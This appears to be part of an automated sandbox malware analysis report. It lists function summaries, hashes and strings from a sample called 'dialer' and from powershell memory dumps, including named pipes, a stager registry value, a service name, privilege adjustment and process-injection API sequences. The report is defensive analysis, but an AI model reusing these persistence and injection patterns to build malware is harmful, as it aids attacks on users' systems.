                                                • Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd
                                                Similarity
                                                • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                • String ID:
                                                • API String ID: 3197395349-0
                                                • Opcode ID: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
                                                • Instruction ID: 77e74b91c01525272856f4cc0d831f460e31e41d69628a5636d380eeea35235e
                                                • Opcode Fuzzy Hash: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
                                                • Instruction Fuzzy Hash: FC412C73724A518ADB50CF24E4507AA37B4FB54758F40122AFA4D87BA8DF7CE548DB40

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true
                                                • Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd
                                                Similarity
                                                • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                • String ID: .text$C:\Windows\System32\
                                                • API String ID: 2721474350-832442975
                                                • Opcode ID: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
                                                • Instruction ID: 67bc63a508af46db78022d3b449489da2505a4b83f5730346319b859515be5a8
                                                • Opcode Fuzzy Hash: 5b6459bf4908e158894d0240be6af7c22007f1fef7840f3adad859f1057e7803
                                                • Instruction Fuzzy Hash: D6514D37718A4286EF619B11F8586AB7365FB99B98F044231EE4D43BA4DE3CE40DD700

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true
                                                • Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd
                                                Similarity
                                                • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                • String ID: M$\\.\pipe\dialerchildproc64
                                                • API String ID: 2203880229-3489460547
                                                • Opcode ID: 1e8405c3ce3dc3a450943935d6232c4767fdbc18e1eae9273363d4fc7ca69f3e
                                                • Instruction ID: 5bbaf159a4a0a81a5fba38c749953d2ce4c2eda030a2817aa468934ac004ef81
                                                • Opcode Fuzzy Hash: 1e8405c3ce3dc3a450943935d6232c4767fdbc18e1eae9273363d4fc7ca69f3e
                                                • Instruction Fuzzy Hash: AB111F23768A4695EA14DB21E4143BA7361EBA4BA4F444334F95E866F4CF7CF54CE700

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true
                                                • Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd
                                                Similarity
                                                • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                • String ID: \\.\pipe\dialercontrol_redirect64
                                                • API String ID: 2071455217-3440882674
                                                • Opcode ID: e726fb2786c7da4def9263b705b77f3199000bde839af328c4a314f779c2dbfb
                                                • Instruction ID: 14036e5a1928f05883333150c186dcbd9e0985edce3da0c5c37ba84c19921397
                                                • Opcode Fuzzy Hash: e726fb2786c7da4def9263b705b77f3199000bde839af328c4a314f779c2dbfb
                                                • Instruction Fuzzy Hash: 66010022B68A4295EE14DB11A8042BB7361AF65BA1F544334EA5E866F4CF7CF44CA700

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true
                                                • Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                • String ID:
                                                • API String ID: 3676546796-0
                                                • Opcode ID: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
                                                • Instruction ID: 1359e05095c05574719e75ba0de514b85a6851bf2c51eb961b8a05d802c02d56
                                                • Opcode Fuzzy Hash: d2e1c125c576b14afbc05c5ef5102f2ffb5d105b10e46613ced4fa4cc78aada4
                                                • Instruction Fuzzy Hash: 9F218773B186128BEB148B16E45457B76A2FB95B80F144138EE4A47B74CE3DF448DB40

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true
                                                • Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd
                                                Similarity
                                                • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                • String ID:
                                                • API String ID: 1323846700-0
                                                • Opcode ID: 5cc818aebe366c74c24883c76324c687b53e60aeb57db289d72e63b86dd9db26
                                                • Instruction ID: 8c6f546278c93392f150423caf3574d556322c57e2f2cb42ec94d9713e372596
                                                • Opcode Fuzzy Hash: 5cc818aebe366c74c24883c76324c687b53e60aeb57db289d72e63b86dd9db26
                                                • Instruction Fuzzy Hash: 7B11AF62F1D6428AFF189B26A81406A67B1EF99B90F088134EE0D83B65DE3DF4499700

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true
                                                • Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd
                                                Similarity
                                                • API ID: Process$CloseHandleOpenWow64
                                                • String ID:
                                                • API String ID: 10462204-0
                                                • Opcode ID: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
                                                • Instruction ID: ed255df1b1c2caaaf593b135362571ca4076ba738a6f4abb94fd063d7440164f
                                                • Opcode Fuzzy Hash: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
                                                • Instruction Fuzzy Hash: 92F09032B1878287EF148F16B48416A6260FB88BC0F449138FE8E83B68DF3DE448C700

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00007FF67E6C2328: VerSetConditionMask.NTDLL ref: 00007FF67E6C2397
                                                  • Part of subcall function 00007FF67E6C2328: VerSetConditionMask.NTDLL ref: 00007FF67E6C23A8
                                                  • Part of subcall function 00007FF67E6C2328: VerSetConditionMask.NTDLL ref: 00007FF67E6C23B9
                                                  • Part of subcall function 00007FF67E6C2328: VerifyVersionInfoW.KERNEL32 ref: 00007FF67E6C23CC
                                                  • Part of subcall function 00007FF67E6C2328: GetCurrentProcessId.KERNEL32 ref: 00007FF67E6C23DE
                                                  • Part of subcall function 00007FF67E6C2328: OpenProcess.KERNEL32 ref: 00007FF67E6C23EE
                                                  • Part of subcall function 00007FF67E6C2328: OpenProcessToken.ADVAPI32 ref: 00007FF67E6C240F
                                                  • Part of subcall function 00007FF67E6C2328: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF67E6C2429
                                                  • Part of subcall function 00007FF67E6C2328: AdjustTokenPrivileges.KERNELBASE ref: 00007FF67E6C246D
                                                  • Part of subcall function 00007FF67E6C2328: GetLastError.KERNEL32 ref: 00007FF67E6C2477
                                                  • Part of subcall function 00007FF67E6C2328: CloseHandle.KERNELBASE ref: 00007FF67E6C2480
                                                  • Part of subcall function 00007FF67E6C2328: FindResourceExA.KERNEL32 ref: 00007FF67E6C2494
                                                  • Part of subcall function 00007FF67E6C2328: SizeofResource.KERNEL32 ref: 00007FF67E6C24AB
                                                  • Part of subcall function 00007FF67E6C2328: LoadResource.KERNEL32 ref: 00007FF67E6C24C4
                                                  • Part of subcall function 00007FF67E6C2328: LockResource.KERNEL32 ref: 00007FF67E6C24D6
                                                  • Part of subcall function 00007FF67E6C2328: GetCurrentProcessId.KERNEL32 ref: 00007FF67E6C24E3
                                                • ExitProcess.KERNEL32 ref: 00007FF67E6C231F
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true
                                                • Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd
                                                Similarity
                                                • API ID: Process$Resource$ConditionMask$CurrentOpenToken$AdjustCloseErrorExitFindHandleInfoLastLoadLockLookupPrivilegePrivilegesSizeofValueVerifyVersion
                                                • String ID:
                                                • API String ID: 2329183550-0
                                                • Opcode ID: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
                                                • Instruction ID: eca7c803a732fbf75176e2512bccda647ab53a621e4b8996e5bc69f08233df1a
                                                • Opcode Fuzzy Hash: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
                                                • Instruction Fuzzy Hash: 1AA02441F34541C5DD043370140D07D11111F70301F400530F40DC5373CD1C300D1310

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 199 7ff67e6c26e8-7ff67e6c2710 200 7ff67e6c28be-7ff67e6c28c6 199->200 201 7ff67e6c2716 199->201 204 7ff67e6c28cc-7ff67e6c28cf 200->204 205 7ff67e6c2b0a-7ff67e6c2b2e ReadFile 200->205 202 7ff67e6c271c-7ff67e6c2723 201->202 203 7ff67e6c284a-7ff67e6c2882 GetProcessHeap HeapAlloc K32EnumProcesses 201->203 208 7ff67e6c2841-7ff67e6c2843 ExitProcess 202->208 209 7ff67e6c2729-7ff67e6c272c 202->209 206 7ff67e6c2c00-7ff67e6c2c16 203->206 212 7ff67e6c2888-7ff67e6c2899 203->212 210 7ff67e6c2b00-7ff67e6c2b05 call 7ff67e6c1768 204->210 211 7ff67e6c28d5-7ff67e6c28da 204->211 205->206 207 7ff67e6c2b34-7ff67e6c2b3b 205->207 207->206 214 7ff67e6c2b41-7ff67e6c2b55 call 7ff67e6c19ac 207->214 215 7ff67e6c27e4-7ff67e6c280f RegOpenKeyExW 209->215 216 7ff67e6c2732-7ff67e6c2735 209->216 210->206 217 7ff67e6c28e0-7ff67e6c28e3 211->217 218 7ff67e6c2aa5-7ff67e6c2ab8 call 7ff67e6c1a44 211->218 212->206 213 7ff67e6c289f-7ff67e6c28b7 call 7ff67e6c10c0 212->213 239 7ff67e6c28b9 213->239 214->206 240 7ff67e6c2b5b-7ff67e6c2b61 214->240 222 7ff67e6c2811-7ff67e6c281f RegDeleteValueW 215->222 223 7ff67e6c2825-7ff67e6c283c call 7ff67e6c1ac4 call 7ff67e6c1768 call 7ff67e6c1000 call 7ff67e6c17f8 215->223 224 7ff67e6c27d5-7ff67e6c27df 216->224 225 7ff67e6c273b-7ff67e6c273e 216->225 227 7ff67e6c2921-7ff67e6c2932 call 7ff67e6c1a44 217->227 228 7ff67e6c28e5-7ff67e6c28ea 217->228 218->206 243 7ff67e6c2abe-7ff67e6c2acd call 7ff67e6c1a44 218->243 222->223 223->206 224->206 233 7ff67e6c2744-7ff67e6c2749 225->233 234 7ff67e6c27c8-7ff67e6c27d0 225->234 227->206 245 7ff67e6c2938-7ff67e6c295a ReadFile 227->245 228->206 236 7ff67e6c28f0-7ff67e6c291a call 7ff67e6c1958 call 7ff67e6c1984 ExitProcess 228->236 233->206 242 7ff67e6c274f-7ff67e6c2773 ReadFile 233->242 234->206 239->206 246 7ff67e6c2b67-7ff67e6c2ba2 GetProcessHeap HeapAlloc call 7ff67e6c14e4 240->246 247 7ff67e6c2beb 240->247 242->206 249 7ff67e6c2779-7ff67e6c2780 242->249 243->206 264 7ff67e6c2ad3-7ff67e6c2afb ShellExecuteW 243->264 245->206 252 7ff67e6c2960-7ff67e6c2967 245->252 268 7ff67e6c2bd5-7ff67e6c2bdb GetProcessHeap 246->268 269 7ff67e6c2ba4-7ff67e6c2baa 246->269 253 7ff67e6c2bf2-7ff67e6c2bfb call 7ff67e6c2c18 247->253 249->206 256 7ff67e6c2786-7ff67e6c279a call 7ff67e6c19ac 249->256 252->206 259 7ff67e6c296d-7ff67e6c29ab GetProcessHeap HeapAlloc ReadFile 252->259 253->206 256->206 276 7ff67e6c27a0-7ff67e6c27a6 256->276 266 7ff67e6c29b1-7ff67e6c29bd 259->266 267 7ff67e6c2a97-7ff67e6c2aa0 GetProcessHeap 259->267 264->206 266->267 273 7ff67e6c29c3-7ff67e6c29cf 266->273 272 7ff67e6c2bde-7ff67e6c2be9 HeapFree 267->272 268->272 269->268 274 7ff67e6c2bac-7ff67e6c2bbe 269->274 272->206 273->267 277 7ff67e6c29d5-7ff67e6c29e0 273->277 278 7ff67e6c2bc0-7ff67e6c2bc2 274->278 279 7ff67e6c2bc4-7ff67e6c2bcc 274->279 281 7ff67e6c27a8-7ff67e6c27b7 call 7ff67e6c10c0 276->281 282 7ff67e6c27bc-7ff67e6c27c3 276->282 283 7ff67e6c2a05-7ff67e6c2a91 lstrlenW GetProcessHeap HeapAlloc call 7ff67e6c18b8 * 3 call 7ff67e6c2c18 GetProcessHeap HeapFree 277->283 284 7ff67e6c29e2-7ff67e6c29ed 277->284 278->279 285 7ff67e6c2bd0 call 7ff67e6c16d8 278->285 279->268 286 7ff67e6c2bce 279->286 281->206 282->253 283->267 284->267 288 7ff67e6c29f3-7ff67e6c2a00 call 7ff67e6c1db4 284->288 285->268 286->274 288->267
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true
                                                • Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd
                                                Similarity
                                                • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                • String ID: SOFTWARE$dialerstager$open
                                                • API String ID: 3276259517-3931493855
                                                • Opcode ID: 57deca5b7dadaa8d94473ef24676dfbe4cb0f61227f20ab4b3d1e5920c79bf4c
                                                • Instruction ID: c76d6e40b7de7f3bdddfcb5e7339a834af4fab83b674ce879807612510374630
                                                • Opcode Fuzzy Hash: 57deca5b7dadaa8d94473ef24676dfbe4cb0f61227f20ab4b3d1e5920c79bf4c
                                                • Instruction Fuzzy Hash: 7CD14263B28A828AEF759F2598042FA2265FF64748F414235F90DC76A5DE3CF64CE740

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true
                                                • Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd
                                                Similarity
                                                • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                • String ID: @
                                                • API String ID: 3462610200-2766056989
                                                • Opcode ID: 703b8677555c06e2b0f299b5c9a482d004feef9bba7614f76242c0c17f04cdf7
                                                • Instruction ID: b4a0c75df6f76afa21b1c2a7b27887433045cbeba94d12d14241816e0a59c33a
                                                • Opcode Fuzzy Hash: 703b8677555c06e2b0f299b5c9a482d004feef9bba7614f76242c0c17f04cdf7
                                                • Instruction Fuzzy Hash: C6616A73B14A418AEB508F26E8446AE77A1FB58B88F004235EE4D97B68DF3CE549D740
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true
                                                • Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd
                                                Similarity
                                                • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                • String ID: dialersvc64
                                                • API String ID: 4184240511-3881820561
                                                • Opcode ID: 1cf1482e3e3cd0594537fe81606e3316bc30941842e87169c6508401709d1003
                                                • Instruction ID: d65cf2d342102c497f68dd3b7ba78b11247a76d0107ace583d012d482766b94c
                                                • Opcode Fuzzy Hash: 1cf1482e3e3cd0594537fe81606e3316bc30941842e87169c6508401709d1003
                                                • Instruction Fuzzy Hash: BE415C33B54B4696EB108F25E8442AE73B5FB98B88B445275EE0E87A24DF3CE149D300
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true
                                                • Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd
                                                Similarity
                                                • API ID: Delete$CloseEnumOpen
                                                • String ID: SOFTWARE\dialerconfig
                                                • API String ID: 3013565938-461861421
                                                • Opcode ID: e1473c9d781940c188c1c4810ff800916bd5dc84dd697936dace2937510ea816
                                                • Instruction ID: f691635641d037d585165fa7cef08fb289990937b6ccf14a088202f284218f62
                                                • Opcode Fuzzy Hash: e1473c9d781940c188c1c4810ff800916bd5dc84dd697936dace2937510ea816
                                                • Instruction Fuzzy Hash: 15117723B28AC585EB608F24E8447FA2374FB54758F401335E64D8A9A8DF7CE14CDB15
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true
                                                • Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd
                                                Similarity
                                                • API ID: File$Write$CloseCreateHandle
                                                • String ID: \\.\pipe\dialercontrol_redirect64
                                                • API String ID: 148219782-3440882674
                                                • Opcode ID: e51fa25a04711743f107767099e23b895b2e502b334cde0a5e9bfd5133e6eec8
                                                • Instruction ID: b4ea94fe3c0344f84c1aeddb68be740745c6b89493476e9c74848a4c9dec2b50
                                                • Opcode Fuzzy Hash: e51fa25a04711743f107767099e23b895b2e502b334cde0a5e9bfd5133e6eec8
                                                • Instruction Fuzzy Hash: 2B118277B64B5182EB508B15E40836AA760FB98FE4F444335EA1D43BA4CF7CE509C740
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1452365444.00007FF67E6C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67E6C0000, based on PE: true
                                                • Associated: 00000005.00000002.1452289538.00007FF67E6C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453070325.00007FF67E6C3000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.1453257420.00007FF67E6C6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ff67e6c0000_dialer.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: ntdll.dll
                                                • API String ID: 1646373207-2227199552
                                                • Opcode ID: 2932c76e980009a225b48c98ed69798072b802092a4ae1a9bffd161348126381
                                                • Instruction ID: 0bff8cd4908ec8cb71f68669b57fc212819e6993c9f966bc730b622eab602717
                                                • Opcode Fuzzy Hash: 2932c76e980009a225b48c98ed69798072b802092a4ae1a9bffd161348126381
                                                • Instruction Fuzzy Hash: A8D0A796F75503C5EE084761685907222105F38B44B840170DC1E86720DE2CF09D5200
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1408245209.00007FFE7DE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7ffe7de60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e6e11e0ab373ede0a0f588fe4669a929ecd213f69d9a39c808e2e6464d33a0e
                                                • Instruction ID: 6b479cc9ca3f45b26d20ec0625c1f659ecfb5cdb17d64b1dc7836442f023a735
                                                • Opcode Fuzzy Hash: 6e6e11e0ab373ede0a0f588fe4669a929ecd213f69d9a39c808e2e6464d33a0e
                                                • Instruction Fuzzy Hash: 8421FA31A1895D8FDF99EF58D441EADB7A1FF69300F140166D40AD7296DE24EC82CBC1
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1407265430.00007FFE7DD4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD4D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7ffe7dd4d000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bef4c4e1d3cfa9448e0d426a33a376de2c3c4c01cea62120fab64b9d7be8ab09
                                                • Instruction ID: e450a331d686010afe6eb6771795ddc5dca457db62bae3ef2aa4adeaa366e627
                                                • Opcode Fuzzy Hash: bef4c4e1d3cfa9448e0d426a33a376de2c3c4c01cea62120fab64b9d7be8ab09
                                                • Instruction Fuzzy Hash: CB113A3151CF088F9BA9EF1DE48995277E0FB98320B10065FE559C7666D731E886CBC2
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1408245209.00007FFE7DE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7ffe7de60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 79946f02ce72a30f349b55584d04ed382274e5e1e21bcca75a071555e2c24d9b
                                                • Instruction ID: e478ab941d87a3314b0bfb083c8b10e5623155f5bb6d347b5e0573886c3db446
                                                • Opcode Fuzzy Hash: 79946f02ce72a30f349b55584d04ed382274e5e1e21bcca75a071555e2c24d9b
                                                • Instruction Fuzzy Hash: 6701A77111CB0C4FD744EF0CE451AA9B3E0FB85360F10062EE58AC3661D632E881CB41
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1408921937.00007FFE7DF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7ffe7df30000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ca90d0c8ce9c3cc3a22fbe6c459b932c463cb1aa961a088a0e9d4b2a61517ce0
                                                • Instruction ID: 0a606c649f7b16d20e3e6f30712d2f79a3d9822079b06c3cf1132b65d068ad7f
                                                • Opcode Fuzzy Hash: ca90d0c8ce9c3cc3a22fbe6c459b932c463cb1aa961a088a0e9d4b2a61517ce0
                                                • Instruction Fuzzy Hash: 0A018F3391D5C44FEB79EB18A8454A877E0EF0232071901BBD168DB163E925AC45C749
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1408245209.00007FFE7DE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7ffe7de60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: feac9ac8b17957b7279d1a9665479890de40e7682e248c2ea033e6f2efb45b11
                                                • Instruction ID: a354b0a3dfa7c306960c92becb63bf76e772f447fbc98311a6ebc8d487f95fb5
                                                • Opcode Fuzzy Hash: feac9ac8b17957b7279d1a9665479890de40e7682e248c2ea033e6f2efb45b11
                                                • Instruction Fuzzy Hash: 89F0A77270C90D4BA70C661CB8465F873C1CB95360B00417FF44ACA657EC26A88382C5
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1408921937.00007FFE7DF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7ffe7df30000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 81267c2e894e60db3d4ac15f2268a505fb04a2485a363f5e751c4fc8cd30f40f
                                                • Instruction ID: 82442f39d868adeab1138ff993a6325cce46d0f67d4ac9b7b5593ec06db3b162
                                                • Opcode Fuzzy Hash: 81267c2e894e60db3d4ac15f2268a505fb04a2485a363f5e751c4fc8cd30f40f
                                                • Instruction Fuzzy Hash: A601FF3290D6848FE76AFB2CA8454A8BBE0FF41320B0901BBD06DCB063E626AC54C705
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.1408921937.00007FFE7DF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_7ffe7df30000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0f8aca77b87f9ef16d75743d676047026a22584c86c2ad89418c322b7fa7f56f
                                                • Instruction ID: 9da30d264e07bae295e035884256743d361c8af840e8d9941c9ab73e909b122c
